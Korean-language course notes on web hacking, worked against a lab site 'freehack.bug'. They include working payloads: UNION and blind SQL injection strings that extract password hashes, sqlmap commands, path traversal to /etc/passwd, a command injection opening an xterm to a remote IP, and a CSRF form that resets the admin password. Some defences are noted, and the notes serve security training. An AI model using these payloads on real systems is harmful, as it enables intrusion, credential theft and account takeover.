Cross Site Script Process

SQL INJECTION - server side attack

공격자가 입력한 데이터에 대한 유효성을 점검하지 않아 DB 쿼리문이 변경 되어 부적절한 SQL 명령을 수행할 수 있는 공격이다

-> 데이터베이스의 내용을 웹상으로 쭉 유출시키는 공격기법

-> 커멘드명령, DB 내용, 서버 컨트롤 장악 하는 공격

** XSS 는 클라이언트쪽 사용자 권한을 획득하는 사용자의 패스워드, 정보를 바꾸는 형태이다.

SQL INJECTION 종류

• Union (옛날 공격기법) - 실습예정
• Error Based (옛날 공격기법)
• Blind SQL (최근 가장 많이 발생하는 취약점) - 실습예정
• Stored Procedure based

SQL 인젝션 취약점이 존재할 경우, 공격자는 xp_cmdshell과 같은 확장 프로시저를 통해 서버의 운영 체제에 대한 불법적인 접근을 시도할 수 있다.

공격 유형 : DB 정보 열람, DB 정보 변경/삭제, 커맨드 명령 실행, 파일 생성 및 실행

SQL대표적인 커맨드 : select, update, delete, insert

• Union

'or''=’  (조건을 항상 참으로 만든다.)

아이디 / 비밀번호에 동일하게 입력한다.

Check for vulnerability

Check for UNION function (no값이 유효하지 않아야 원하는 값 출력)

http://freehack.bug/?main=/board/board_view.php3&no=0' union select 1,2,3,4,5,6,7%23

프로그램에서 1 5 7은 출력은 하라는 소스가 스크립트에 없기 떄문에 출력이 되지 않는다.

Check for MySQL version

http://freehack.bug/?main=/board/board_view.php3&no=0' union select 1,2,3,@@version,5,6,7%23

공격 프로세스

information schema에서 table name 뽑아옴 → 실제 member table의 아이디, 패스워드를 뽑음

http://freehack.bug/?main=/board/board_view.php3&no=0' union all select 1,2,3, column_name,5,6,7 from information_schema.columns where table_name='member' limit 0,1%23 <--- no

http://freehack.bug/?main=/board/board_view.php3&no=0' union all select 1,2,3, column_name,5,6,7 from information_schema.columns where table_name='member' limit 1,1%23 <--- id

http://freehack.bug/?main=/board/board_view.php3&no=0' UNION SELECT 1,2,3,column_name,5,6,7 from information_schema.columns where table_name='member' limit 2,1%23 <--- pass

http://freehack.bug/?main=/board/board_view.php3&no=0' UNION SELECT 1,2,id,pass,5,6,7 from member limit 0,1%23 <-- admin,

*A4B6157319038724E3560894F7F932C8886EBFCF

http://freehack.bug/?main=/board/board_view.php3&no=0' UNION SELECT 1,2,id,pass,5,6,7 from member limit 1,1%23<-- guest,

• A4B6157319038724E3560894F7F932C8886EBFCF

• Blind SQL

데이터베이스 결과가 외부에 출력되지 않고(ex> 로그인 서비스), 서버 내부적으로만 처리되는 구조에서 SQL Injection 기법을 통해 데이터베이스에 존재하는 값을 알아내는 공격 방식이다.

일반적으로 참/거짓을 이용하여 데이터를 얻어온다.

ex> 로그인 성공 -> 참, 로그인 실패 -> 거짓

• Union INJECTION → 덩어리채 뽑음

• Blind INJECTION → 글자 하나씩 대조

예를 들어 s라는글자를 뽑아오고 → i 뽑고 .. → g 뽑고

(a부터 쭉 집어넣고 한글자씩 대조를 해서 요청을 한다.

** Union select보다 훨씬 서버쪽으로 요청하는 쿼리의 양이 많아질수 밖에 없다.

노가다로 한단어씩 추출한다. 단어가 맞을 경우 통과되고 아닐경우 에러메시지가 올라온다.

아래와 같이 ID에 SQL query / PASSWORD 1234 또는 아무거나 입력하고 로그인을 시도

// Database 이름 크기 추출
id : kioo' and length(DATABASE()) < 12##  (T)
id : kioo' and length(DATABASE()) = 10##  (F)
id : kioo' and length(DATABASE()) = 8##  (freehack, T)
id : kioo' and length(DATABASE()) < 7##  (F)


// Database 이름 추출
id : kioo' and ASCII(SUBSTRING((DATABASE()),1,1)) < 102##  (F)
id : kioo' and ASCII(SUBSTRING((DATABASE()),1,1)) = 102##    -> f
id : kioo' and ASCII(SUBSTRING((DATABASE()),2,1)) = 114##    ->r
id : kioo' and ASCII(SUBSTRING((DATABASE()),3,1)) = 101##    -> e

// Table 이름 추출
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),1,1)) < 130##
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),1,1)) = 98##  -> b
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),2,1)) = 111## -> o
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 0,1),3,1)) = 97## -> a

kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 1,1),1,1)) = 109##  -> m
kioo' and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE TABLE_SCHEMA='freehack' limit 1,1),2,1)) = 101## -> e

// 컬럼명 추출
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),1,1)) < 130##
test' or ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),1,1)) < 130##


kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),1,1)) = 110## ->n
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 0,1),2,1)) = 111## ->o


kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 1,1),1,1)) = 105## ->i
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 1,1),2,1)) = 100## -> d

kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),1,1)) = 112## ->p
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),2,1)) = 97## -> a
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),3,1)) = 115## -> s
kioo' and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE TABLE_NAME='member' limit 2,1),4,1)) = 115## ->s

// 패스워드 추출(1) *4ACFE3202A5FF5CF467898FC58AAB1D615029441

kioo' and ASCII(SUBSTRING((select pass from member limit 0,1),1,1)) < 130##
kioo' and ASCII(SUBSTRING((select pass from member limit 0,1),1,1)) = 42## ->*
kioo' and ASCII(SUBSTRING((select pass from member limit 0,1),2,1)) = 52## -> 4

// 패스워드 추출(2)
id : kioo' and (ASCII(substring(pass,1,1))=42) ##            ->----------- 42 는 * 임
pw : 아무거나  
* C8D060EB2D0AEFC164BE22E2F8A52C0E99AF19A9

id : kioo' and (ASCII(substring(pass,2,1))=67) ##            ->---------- 67 는 C 임
pw : 아무거나

id : admin' and (ASCII(substring(pass,1,1))=42)## ->----------- 42 는 * 임
pw : 아무거나
*A4B6157319038724E3560894F7F932C8886EBFCF

폰트 스캐너 (사용 주의)

"폰트 스캐너"라는 용어는 일반적으로 웹사이트나 애플리케이션에서 사용되는 폰트를 분석하고 식별하는 도구나 기술을 의미할 수 있습니다. 폰트 스캐너는 웹페이지에서 사용된 폰트의 종류와 스타일을 추출하여 이를 보여주는 기능을 가집니다.

nmap -v -A freehack.bug

SQL MAP

https://sqlmap.org/ 접속후 오른쪽에 다운로드 zip파일 다운

https://github.com/sqlmapproject/sqlmap/zipball/master

sqlmap.py --shell

u "http://freehack.bug/?main=/board/board_view.php3&no=232" --dbs

u "http://freehack.bug/?main=/board/board_view.php3&no=232" -D freehack --tables -u "http://freehack.bug/?main=/board/board_view.php3&no=232" -D freehack -T member --columns

u "http://freehack.bug/?main=/board/board_view.php3&no=232"

XPATH INJECTION

조작된 XPath(XML Path Language) 쿼리를 보냄으로써 비정상적인 데이터를 쿼리해 올 수 있는 취약점으로, XML 문서에 데이터를 저장하는 웹사이트는 사용자가 입력한 내용의 데이터를 찾기 위해 XPath를 사용 하고, 이런 입력이 필터링이나 보안을 고려하지 않은 채 XPath 쿼리 안에 입력된다면 웹사이트의 로직을 손상시키거나 특정 데이터를 추출할 수 있게 된다.

-> XPath 인젝션은 사용자가 입력한 데이터가 제대로 검증되지 않을 때 발생하는 취약점으로, 이로 인해 공격자는 웹사이트의 데이터를 유출하거나 조작할 수 있게 됩니다.

http://freehack.bug/XML/

대응 방안

-> 입력 값 검증 필요

-> XPATH parameterized 사용

Command INJECTION

-> 프로그램이 외부에서 입력 받은 시스템 명령어를 검증하지 않고 실행하는 경우 의도하지 않은 시스템 명령어가 실행될 수 있는 취약점이다.

• 공격 유형 -> 부적절한 권한 변경 ->시스템 권한 획득 -> 시스템 동작/운영에 악영향

개발자가 리눅스나 관련 명령어 프로그램을 짜는데 웹상에서 커멘드를 쉽게 찾을 수 있게 해논 것

리버스 텔넷 / SS터널링 / DNS 터널링

• 리버스텔넷

리버스 텔넷(Reverse Telnet)은 일반적으로 원격 장치와의 통신을 위해 사용하는 텔넷(Telnet) 프로토콜의 변형입니다. 이 기술은 특정 장치에 대한 원격 접근을 가능하게 하며, 주로 네트워크 장비나 IoT(사물인터넷) 디바이스에서 사용됩니다.

아래 사진에 넣기

ls ; xterm -display 192.168.1.40:1.0 &

• 정상적으로 텔넷 거는게 아니라 서버쪽에서 클라이언트 피씨 쪽으로 텔넷을 건다

 가급적 시스템 명령어 사용 금지  외부에서 전달되는 데이터와 조합 금지  필터링을 통한 다중 명령 실행 금지

파라미터 조작

• 웹 어플리케이션 상에 존재하는 모든 실행경로에 대해서 접근제어를 검사하지 않거나 미흡한 경우 공격자가 접근 가능한 실행경로를 통해 사용자의 정보를 유출 하거나 일시적인 권한 상승이 가능한 취약점.
• URL/파라미터 변조의 경우 불충분한 인증 및 인가 취약점과 유사하지만 프로세스 검증을 우회하는 것 이외에 사용자 입력 값에 대한 검증 누락이 발생하는 모든 상황을 포함하고 있으므로 SQL 인젝션, 불충분한 인증 및 인가, 크로스 사이트 스크립트 (XSS) 공격에 활용될 수 있음

네이버 카페 같은 곳에서 운영자가 이 Query를 통해 게시글을 최상단(공지)으로 고정 시킬 지 정한다 → 취약점 발생 -> web proxy tool을 통한 쿼리를 조작해서 내 마음대로 최상단에 내 게시글을 고정할 수 있음

http://freehack.bug/member/member_modify2.html?id=test

http://freehack.bug/member/member_modify2.html?id=admin

인증권한 체크 부실로 발생함

관리자권한으로 바꿀 수 있음

웹 어플리케이션에서 제공하는 정보와 기능을 역할에 따라 배분함으로써 사용자가 변경할 수 있는 데이터의 노출을 최소화하는 것이 필요하며, 서버로 전송된 사용자 입력 값의 경우 세션 및 데이터베이스와 비교를 하여 데이터가 변조되었는지 검증할 수 있는 과정을 구현해야 함

→ 세션을 가지고 인증체크를 하라는 말

IT정보보호 구축 가이드 - sk 쉴더스 발행 3.0 나옴

FILE UPLOAD

파일이 첨부되서 올라오는지를 잘 확인해야함 - 공격자는 웹 쉘을 업로드해서 모든 정보를 열람 가능하게 만들 수 있다.

• 취약점 설명 

-> 파일 업로드 취약점이랑 서버에 파일이 업로드 되는 기능을 이용하여, 업로드 된 파일을 웹 서버에 요청할 때, 웹 서버가 Server Side Script로 해석하여 생기는 취약점

-> 웹 사이트의 파일 업로드 기능을 이용하여 인가 받지 않은 파일을 서버 에 업로드 하는 공격 

• 공격 유형

1. WebShell 업로드 

2. DOS(Disk Full)

3. 시스템 권한 획득

이 표는 APM 스택을 포함한 웹 서버, 데이터베이스, 서버 사이드 스크립트 및 파일 확장자를 간단히 정리한 것입니다. 각 웹 서버와 그에 대응하는 데이터베이스 및 스크립트 언어의 조합을 보여줍니다.

• 악성파일 업로드

▪ 공격 시나리오 : 웹쉘 형태의 파일을 업로드 후 실행하면 서버의 자원을 장악할 수 있음

▪ 파일 업로드 공격은 1.파일이 업로드 되어야 하고 2.업로드 경로를 알 수 있어야 하고, 3.실행 권한이 있어 실행시킬 수 있어야 함

웹사이트 게시글 작성 할때 php 파일을 업로드 하지 못하게 막아놨다. -> 코드를 통해 확장자 파일이 . 으로 구분이 된다는 것을 알았다

그래서 앞에 .jpg 를 사용함으로써 코드의 헛점을 노려 우회할 수 있다.

아래의 사진은 유명한 C99Shell(웹쉘)화면

FILE DOWNLOAD

파일 다운로드 취약점이란 서버에 업로드 된 파일을 다운로드 받을 수 있게 만들어진 서비스를 이용하여, 정해진 파일이 아닌 다른(시스템 파 일, 소스 코드 등)파일을 다운로드 받을 수 있는 취약점이다.

다른파일은 시스템파일(etc의 패스워드 파일, hosts 파일 같이 없어서는 안되는 파일들) 이나 소스 코드가 될 수 있다.

개발자가 의도하지않게 다른 파일을 의도하는 것

**커멘드 인젝션- 개발자가 의도하지않게 다른 파일도 같이 수행하는 것

기존 URL

http://freehack.bug/board/board_down.php3?file_name=c99.php

공격 실행

URL에 아래와 같이 작성하면 루프가 돌면서 etc/passwd 파일을 받을 수 있음

http://freehack.bug/board/board_down.php3?file_name=/../../../../../../etc/passwd 

./ 를 강제로 지우는 아래와 같은 코드가 있으면 

-> ..// 이런식으로 두번 적으면 ./ 가 지워져도 ./ 한묶음이 남기 때문에 우회할 수 있다.

공격 유형

• 소스 코드 유출 - 어느정도 경로를 알아야지 할 수 있음
• 중요 파일 유출
• 데이터베이스 정보 유출 - 디비 연결정보 파일
• DownLoad 취약점
• 저장된 경로 찾기(이미지/에러베이스 등)
• 필터링 우회 • 대응 방앆
• 필터링을 통한 차단
• 직접 링크보다는 간접링크 사용 • 갂접 링크를 통한 필터링 및 접근 제어(악성코드/FlashGet 등)

개발자가 의도하지 않는 행위를 할 수 있는 것

INCLUSION ATTACK

페이지를 렌더링 할 때 웹 페이지에 동적으로 포함되는 INCLUDE 파일 을 사용하면 한 콘텐츠를 사이트의 여러 페이지에 쉽게 포함시킬 수 있는 기능을 악용하여 사용할 수 있는 취약점이다.

->INCLUDE 파일은 웹 페이지에서 공통 콘텐츠를 쉽게 재사용할 수 있도록 도와주지만, 잘못 사용하면 보안 취약점이 생길 수 있습니다. 공격자가 악의적인 코드를 포함한 파일을 서버에 업로드하고 이를 INCLUDE하면, 사용자에게 악성코드가 실행될 수 있습니다. 따라서 INCLUDE 파일 사용 시 보안에 주의해야 합니다.

Include/require/require_ once/include_ once

• RFI - Remote File inclusion

외부에 존재하는 컨텐츠를 동적 로드 가능

allow_url_fopen 허용 시 동작

http/ftp 등 다양한 프로토콜 지원

외부 서비스(블로그, 카페, 자료실 등)를 통한 공격 가능

원격에 있는 파일을 사용해서 명령을 수행

• LFI - Local File inclusion → 로컬에 있는 파일을 인크루드 시켜서 발생하는 취약점

내부에 존재하는 컨텐츠를 동적으로 로드 가능.

• Log 파일, 홖경 변수, 자료실 등 이용.

http://freehack.bug/?main=/data/cmd.txt&cmd=id

인클루드 함수를 잘못써서 외부나 내부에 있는 함수를 잘못 인클루드해서 프로그램이 실행되는 것

기타 웹공격 기법

관리자페이지 노출

• 아래와 같이 추측하기 쉬운 관리자 페이지는 가급적 피하도록 한다. 이런식으로 관리자 페이지 접속하고 → SQL INJECTION

http://admin.victim.comhttp//www.victim.com/admin

http://www.victim.com/manager/http://www.victim.com/master/http://www.victim.com/system

사용자 인증 부재 취약점

http://freehack.bug/admin/member/**member_list..php3**

유추할 수 있는 이름으로 지정하면 찍어서 맞출 수 있다.

이용자 인증정보 재사용

▪ 개요 : 세션 값을 훔쳐 타 사용자 이용 환경에서 사용 시 훔친 세션 값의 인증 및 권한을 그대로 가지고 있는 취약점/공격

▪ 예상 가능 공격 : 타 사용자 권한 탈취 후 서비스에 따른 공격 예) 금융 앱에서 피해자의 계좌에서 공격자의 계좌로 송금

▪ 취약점 확인 방법 : 세션값을 복사 후 타 PC 에서 사용해보고 복수의 위치에 서 세션값이 사용 가능한지 확인

▪ 보안 방법 ➢ 처음 세션 발급 시 IP정보를 세션 변수에 담아 두었다가 이 후 동일한 세션값을 가지는 클라이언트가 접속 시에 비교함 ➢ 금융기관에서는 내부망 IP 정보도 세션을 나누어 분배하므로 클라이언트/서버 프로그램을 설치하여 MAC주소 비교하여 세션 재 사용 취약점에 대응함 ➢ 중복 로그인을 차단

• 유추가능한 인증정보 이용(세션), 불충분한 세션종료 처리 말로 설명 • 고정된 인증정보 재사용

TEST 준비

1번 GET POST 메소드

2번 응답값 200ok 

3번 File download 취약점 

4번 CSRF  SSRF

5번 ???

• 윈도우서버 2019 설치

윈도우 서버 2019는 마이크로소프트에서 개발한 서버 운영 체제입니다. 이 운영 체제는 다양한 서버 기반의 작업을 수행하기 위해 설계되었으며, 기업 및 기관에서 주로 사용됩니다.

* 가상 머신(VMware)에서 Player -> manage -> virtual machine setting - CD/DVD - use ISO image file - > browser → 다운 받은 Window 2019 ISO파일 선택

• IIS 설치

IIS(Internet Information Services)는 마이크로소프트의 웹 서버 소프트웨어입니다. 이를 통해 웹 사이트를 호스팅하고, 웹 애플리케이션을 운영할 수 있습니다. IIS를 설치하면 웹 서버 기능을 사용하여 다양한 웹 서비스를 제공할 수 있습니다.

• MSSQL 2019 설치

MSSQL(마이크로소프트 SQL 서버)은 데이터베이스 관리 시스템(DBMS)으로, 데이터베이스를 생성하고 관리하는 데 사용됩니다. MSSQL 2019는 최신 버전 중 하나로, 다양한 데이터 저장 및 처리 기능을 제공합니다. 이를 통해 애플리케이션에서 데이터를 효율적으로 관리할 수 있습니다.

이 세 가지 요소는 함께 사용되어 웹 애플리케이션을 구축하고 운영하는 데 필요한 기본적인 인프라를 제공합니다. 예를 들어, IIS에서 웹 사이트를 호스팅하고, MSSQL에서 데이터를 관리함으로써 동적인 웹 서비스를 제공할 수 있습니다.

Web proxy tool (burp suite)

프록시설정 -> 프록시 서버 사용 켬 

로컬 리스트 127.0.0.1

포트 8080

웹브라우저에서 요청시 burp suite 로 인터셉트 -> 코드 점검&수정 -> forward -> 브라우저 접속

* 만약 8080 포트를 다른곳에서 사용하고 있으면 충돌이 나서 burp suite가 정상작동 되지 않을 수 있다. → 8080 포트에 연결되어 있는 프로그램을 내리거나 포트를 임의로 정해서 바꿔줄 수 있다.

proxy- options - proxy listener - edit 8080포트를 예를들어 8888 으로 바꾼다. 이렇게 변경 할 경우, 수동 프록시 설정 포트도 동일한 값으로 바꿔야한다.

WAR GAME

• 클라이언트 사이드에서 해결하는법

브라우저 요청 -> burp suite 인터셉트 -> 코드 수정 -> forward -> 통과

• 서버 사이드에서 해결하는법

브라우저 요청 -> 새로고침 -> burp suite 인터셉트 -> HTML 코드 수정 -> forward -> 통과

OWASP TOP 10

Open Web Application Security Project에 따라 악용가능성, 탐지가능성 및 영향에 대해 빈도수가 높고 보앆상 영향을 크게 줄 수 있는 10가지 웹 애플리케이션 보앆 취약점 목록

• A01 : Broken Access Control (접근 권한 취약점)
• A02 : Cryptographic Failures (암호화 오류)
• A03: Injection (인젝션)
• A04: Insecure Design (안전하지 않은 설계)
• A05: Security Misconfiguration (보안설정오류)
• A06: Vulnerable and Outdated Components (취약하고 오래된 요소)
• A07: Identification and Authentication Failures (식별 및 인증 오류)
• A08: Software and Data Integrity Failures(소프트웨어 및 데이터 무결성 오류)
• A09: Security Logging and Monitoring Failures (보안 로깅 및 모니터링 실패)
• A10: Server-Side Request Forgery (서버 측 요청 위조)

CROSS SITE SCRIPT(XSS)

사용자 요청에 의해 검증되지 않은 외부 입력 데이터(악의적/부적절한 스크립트)가 포함된 동적 웹페이지가 생성/전송되는 경우, 사용자가 해 당 동적 웹페이지를 열람함으로써 웹페이지에 포함된 악의적/부적절한 스크립트가 실행되는 공격이다.

- 악의적인 사용자가 게시글을 업로드하고 관리자가 게시글을 읽으면 cookies값이 해커에게 넘어간다. 

공격 시나리오

• 사용자의 개인정보 탈취 : Keylogger 형태의 스크립트를 사용하여 키보드 입력값 탈취
• 사용자의 쿠키정보 탈취 : document.cookie를 사용하여 해당 사용자의 쿠키/세션값 탈취
• 악성코드 다운로드 또는 실행 : 악성코드 다운로드 링크 연결, 낮은 보안 수준에서의 자동실행
• 피싱 사이트로 강제 이동 : location.href 등을 사용하여 페이지 강제 이동

*토막상식 : drm은 문서가 외부로 유출되었을때 열리지 않게 암호화를 하는 것

공격종류

Reflected XSS (반사형 크로스사이트 스크립팅),

Stored XSS (저장형 크로스사이트 스크립팅),

DOM Based XSS (DOM 기반 크로스사이트 스크립팅)

Stored XSS (저장형 크로스사이트 스크립팅)  - 서버와 통신 // 게시판에 삽입

악성 스크립트가 서버에 저장된 후, 다른 사용자가 해당 스크립트가 포함된 데이터를 요청할 때 실행되는 공격 방식입니다. 이 유형의 XSS는 일반적으로 데이터베이스에 사용자 입력이 저장되는 경우 발생합니다.

공격 과정

1. 악성 스크립트 입력: 공격자는 웹 애플리케이션의 입력 필드(예: 댓글, 게시물, 프로필 등)에 악성 JavaScript 코드를 포함하여 데이터를 입력합니다. 예를 들어, <script>alert('XSS');</script>와 같은 코드를 입력할 수 있습니다.
2. 서버에 저장: 입력된 데이터는 서버의 데이터베이스에 저장됩니다. 이때, 입력 값에 대한 검증이나 인코딩이 이루어지지 않으면, 악성 스크립트가 그대로 저장됩니다.
3. 다른 사용자 요청: 이후 다른 사용자가 해당 데이터에 접근할 때(예: 댓글 목록 보기), 웹 애플리케이션은 저장된 데이터를 불러와 웹 페이지에 표시합니다.
4. 스크립트 실행: 사용자의 브라우저는 페이지를 렌더링하면서 저장된 악성 스크립트를 실행하게 됩니다. 이를 통해 공격자는 사용자 세션 정보, 쿠키, 기타 민감한 정보를 탈취할 수 있습니다.

Reflected XSS (반사형 크로스사이트 스크립팅) - 서버와 통신 // 파라미터에 삽입

공격자가 악성 스크립트를 포함한 URL을 생성하고 이를 사용자가 클릭하게 하여, 해당 스크립트가 웹 페이지에서 실행되도록 하는 공격 방식입니다

사용자의 브라우저는 이 페이지를 로드하면서 악성 스크립트를 실행하게 됩니다. 반사형 XSS의 주요 특징은 악성 코드가 서버에 저장되지 않고, 요청과 응답 과정에서 즉각적으로 반사된다

DOM Based XSS (DOM 기반 크로스사이트 스크립팅) - 서버와 통신하지 않는다

DOM Based XSS(=type-0 XSS)는 피해자의 브라우저에서 DOM 환경을 수정하여 클라이언트 측 코드가 예상치 못한 방식으로 공격 구문이 실행되는 XSS(Cross Site Scripting) 공격입니다. 즉, 페이지 자체(HTTP 응답)는 변경되지 않지만, 페이지에 포함된 클라이언트 측 코드는 DOM환경에서 발생한 악의적인 변조로 인해 공격 구문이 실행됩니다.

• 브라우저 자체에서 DOM을 통해서 실행이 된다.
• 일반적으로 메일의 링크를 통해서 전달 -> 사용자가 악의적인 링크를 클릭하도록 유도

• DOM 기반 XSS 공격 시나리오

- 악의적인 사용자가 보안이 취약한 웹 페이지를 발견했습니다.
- 보안이 취약한 웹 페이지에서 악성 스크립트가 실행되도록 URL 주소를 만들어 일반 사용자에게 전달합니다.
- 일반 사용자는 메일 등을 통해 전달받은 URL 링크를 클릭합니다. 서버로부터 HTML 문서를 전달받습니다.
- 사용자의 브라우저가 응답 받은 HTML 문서를 읽으면서 필요한 스크립트를 실행하는 중에 악성 스크립트가 동작합니다.
- 악성 스크립트를 통해 사용자 정보가 악의적으로 전달됩니다

Cross Site Script (CSRF) - client side

Cross Site Request Forgery, 웹사이트 취약점 공격의 하나로, 사용자가 자싞의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹사이트에 요청하게 하는 공격을 말한다.

ex) 회원 정보 수정, 데이터 수정 또는 삭제, 비방/욕 댓글

- 해커의 악의적인 스크립트 게시글을 관리자가 읽으면 관리자 계정의 비밀번호가 해커가 설정한 비밀번호로 바뀔 수 있다.

- 클라이언트 사이드에서 계정정보를 바꾸는 공격 -> 클라이언트의 정보가 목표, 서버의 공격이 아니다.

• 해커가 아래 스크립트를 이용해 악의적인 게시글(본문에 스크립트 삽입)을 작성한다.
• 관리자가 게시글을 읽으면 아래의 스크립트에서 설정한 것처럼 관리자 계정의 비밀번호가 12345 로 바뀐다.

<form action="http://freehack.bug/member/member_modify.php3" method="post" name="join"><input type="password" name="pass" value="12345" /><input type="password" name="pass2" value="12345" /><input type="text" name="username" value="Admin" /><input type="text" size=30 name="email" value="admin@freehack.com" /><input type="text" size=80 name="addr" value="Korea!!" /><input type="text" size=5 name="zipcode1" value="111" /><input type="text" size=5 name="zipcode2" value="222"/><textarea name="comment" rows="5" cols="50">Hacked by Kioo</TEXTAREA></form><script>document.join.submit();</script>

Server Side Request Forgery (SSRF) - server side

SSRF는 Server Side Request Forgery의 약자로 유사한 이름을 가진 CSRF(Cross Site Request Forgery) 와는 다르게 클라이언트 측의 요청 을 변조시키는 것이 아닌 서버 측 자체의 요청을 변조하여 공격자가 원하는 형태의 악성 행위를 서버에 던져주면 서버가 검증 없이 그대로 받아 그의 따른 행동/응답을 해주는 공격

* 공격자가 내부망에 있는 서버를 접근 하기 위해서는 직접 접근은 불가 (방화벽, IDS, IPS …. 등) 보안장치가 많다. 심지어 해커(공인아이피)에서 server(사설아이피) 가 보이지도 않는다.

-> 중간에 있는 server의 취약점(매개체역할)을 통해 서버(사설 아이피)를 공격할 수 있다.

SSRF공격을 통해 hacker.bug의 index.html 텍스트(Hacker Page)를 웹 브라우저에 삽입 시킬 수 있다.

또는 

아래와 같은 방법으로 SSH version 정보를 확인할 수 있다. - 다양한 방법으로 사용가능

보안대책

• 내부 시스템과 상호 작용하는 변수에 불필요한 값이 입력될 경우 무효처리를 해야 됨
• 변수에 입력된 주소가 올바른 주소가 맞는지 즉 신뢰하는 주소가 맞는지 재검증을 해야 됨

실습에서 hacker.bug 가 믿어도 되는 URL인지 확인할 수 있는 로직을 삽입해야한다.

접근할 수 있는 사이트만 접근할 수 있게하고 접근하면 안되는 사이트는 전부 거절 (화이트리스트)

정상적인 요청으로 공격하기 때문에 웹 방화벽에서 통제가 되지 않는다.

• 여러 우회 공격 기법 중 대상 사이트에 대한 신뢰할 수 있는 도메인과 루프백 주소를 매칭하여 지정해둔 도메인을 요청하는 경우가 존재하기 때문에 요청 시 도메인 이름에 대한 검증도 수행

웹 구조 및 기본지식(HTTP 프로토콜)

• HTTP(Hyper Text Transfer Protocol)

WWW 상에서 주로 HTML 문서를 주고 받는데 사용되는 어플리케이션 계층의 요청/응답 프로토콜

텍스트 형태의 프로토콜

web server와 DB server랑 따로 떨어트려놓는 것이 더 안전합니다.

• >ipconfig /displaydns

Windows 운영체제에서 DNS 캐시를 표시하는 명령입니다. 이 명령어를 실행하면, 현재 시스템에 저장된 DNS 레코드 목록이 나타납니다. DNS 캐시는 웹사이트의 도메인 이름을 IP 주소로 변환하기 위해 사용되며, 이를 통해 웹사이트에 더 빠르게 접근할 수 있습니다.

• >ipconfig /flushdns

Windows 운영체제에서 DNS 캐시를 비우는 명령입니다. 이 명령을 실행하면 현재 시스템에 저장된 모든 DNS 레코드가 삭제되고, 다음 번에 웹사이트에 접근할 때 새로운 DNS 정보를 요청하게 됩니다.

• hosts

hosts 파일은 컴퓨터의 운영 체제에서 도메인 이름을 IP 주소로 변환하는 데 사용되는 간단한 텍스트 파일입니다. 이 파일은 DNS(Domain Name System)보다 우선적으로 참조되어, 특정 도메인 이름에 대해 지정된 IP 주소를 매핑합니다.

• nslookup 

DNS 서버에 대한 쿼리를 수행하여 도메인 이름에 대한 IP 주소나 기타 DNS 레코드를 확인하는 데 사용됩니다.

• DHCP(Dynamic Host Configuration Protocol)

DHCP 서버(Dynamic Host Configuration Protocol Server)는 네트워크에서 클라이언트 기기에 자동으로 IP 주소와 기타 네트워크 설정을 할당하는 서버입니다.

ipconfig /all

DNS 서버는 두개가 있는데 하나가 죽으면 다른 하나가 활성화된다.

네이버 아이피가 한대이면 전세계 사람들의 부하를 버틸 수 없기때문에 부하를 분산시키기 위해 아이피가 4개로 설정함

• nslookup에서 DNS 서버를 변경할 수 있다.

기본적으로 시스템에서 설정된 DNS 서버 대신 다른 DNS 서버를 지정하여 쿼리를 수행할 수 있다는 것입니다. 이를 통해 특정 DNS 서버의 응답을 받아보거나 DNS 문제를 진단하는 데 유용합니다.

Host 헤더란?

Host 헤더는 웹사이트에 요청을 보낼 때, "나는 이 특정 웹사이트를 요청해요!"라고 서버에 알려주는 역할을 합니다.

왜 필요한가요?

• 여러 웹사이트: 하나의 서버에서 여러 웹사이트가 운영될 수 있습니다. 예를 들어, www.google.com과 www.example.com이 같은 서버에 있을 때, 서버는 요청이 어떤 웹사이트에 대한 것인지 알아야 합니다. 이때 Host 헤더가 필요합니다.

예시

예를 들어, 웹 브라우저에서 www.google.com에 접속하려고 하면, 브라우저는 다음과 같은 요청을 서버에 보냅니다:

GET / HTTP/1.1
Host: www.google.com

여기서:

• GET / HTTP/1.1: "웹사이트의 첫 페이지를 요청합니다."
• Host: www.google.com: "나는 구글 웹사이트를 요청해요!"라고 서버에 알려줍니다.

요약

즉, Host 헤더는 서버가 어떤 웹사이트에 대한 요청인지 알 수 있도록 도와주는 정보입니다. 추가 질문이 있으면 언제든지 말씀해 주세요!

User-Agent는 클라이언트(브라우저)가 서버에 "나는 어떤 브라우저와 운영 체제를 사용하고 있어!"라고 알려주는 정보입니다.

Referer : 바로 전에 어떤 페이지를 접속을 했는지 보여준다.

HTTP 응답의 구조와 각 헤더의 역할을 설명하는 예시

HTTP Version | 상태코드 | 코드설명

• HTTP Version: 1.1: 현재 사용 중인 HTTP 프로토콜의 버전을 나타냅니다. 여기서 1.1은 HTTP/1.1 버전으로, 웹에서 가장 많이 사용되는 버전 중 하나입니다. HTTP는 주로 1.0, 1.1, 2.0, 3.0 등의 버전이 있습니다.
• 상태 코드: 서버가 클라이언트의 요청을 처리한 후, 요청의 결과를 숫자로 표기하는 것입니다. 예를 들어:
  • 200: 요청이 성공적으로 처리되었음을 의미합니다.
  • 404: 요청한 페이지를 찾을 수 없음을 의미합니다.
